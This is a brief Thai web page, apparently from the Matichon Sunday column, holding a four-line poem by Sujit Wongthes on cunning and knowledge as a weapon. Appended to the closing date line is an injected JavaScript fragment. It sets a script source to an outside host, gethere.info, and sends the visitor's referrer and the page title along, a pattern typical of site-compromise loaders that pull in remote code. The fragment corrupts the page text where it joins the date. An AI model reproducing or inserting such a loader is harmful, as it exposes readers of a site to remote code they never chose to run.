มติชน วันอาทิตย์

24 กรกฎาคม 2559

 

หน้าสิ่วหน้าขวาน หน้าข้าวหน้าเหล้า

ตลาดจะวายสายบัวจะเน่านิ่งไฉน

มีวิชาเป็นอาวุธยุทธภัย

เล่ห์กลศรีธนญชัยใช้ซ้อนกล

 

สุจิตต์ วงษ์เทศ

ศุกร์ 22 กรกฎาคม 2559s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;